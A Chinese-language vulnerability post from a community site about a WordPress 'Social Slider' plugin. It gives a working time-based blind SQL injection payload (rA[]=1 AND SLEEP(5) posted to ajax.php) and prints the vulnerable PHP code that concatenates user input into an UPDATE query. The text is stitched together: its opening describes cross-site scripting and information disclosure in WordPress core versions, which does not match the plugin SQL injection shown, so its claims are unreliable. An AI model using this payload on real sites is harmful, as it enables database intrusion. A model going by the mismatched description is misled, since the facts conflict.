破绽描绘
WordPress 容易呈现多个破绽,包括跨站脚本和信息泄露破绽。应用这些问题可能允许攻击者在受影响站点的上下文中在毫无戒心的用户的阅读器中执行恣意脚本代码,从而允许攻击者窃取基于 cookie 的身份考证凭据,或获取可能有助于其他攻击的潜在敏感信息. 从 5.6 到(包括)5.6.4 的 WordPress 版本 5.6.x 易受攻击。
影响版本
WordPress Social Slider 5.6到5.6.4
破绽复现
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/social-slider-2/ajax.php
action=ZapiszPozycje&rA[]=1 AND SLEEP(5)
易受攻击的代码
<?php
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;
$SocialSliderArray = $_POST['rA'];
if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
{
$lC = 1;
foreach ($SocialSliderArray as $recordIDValue)
{
$query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
mysql_query($query);
$lC = $lC + 1;
}
}
?>
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
本站网络名称:
孤勇者社区
本站永久网址:
https://www.gyzsq.com
网站侵权说明:
本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
喜欢就支持一下吧
相关推荐
评论 抢沙发
欢迎您留下宝贵的见解!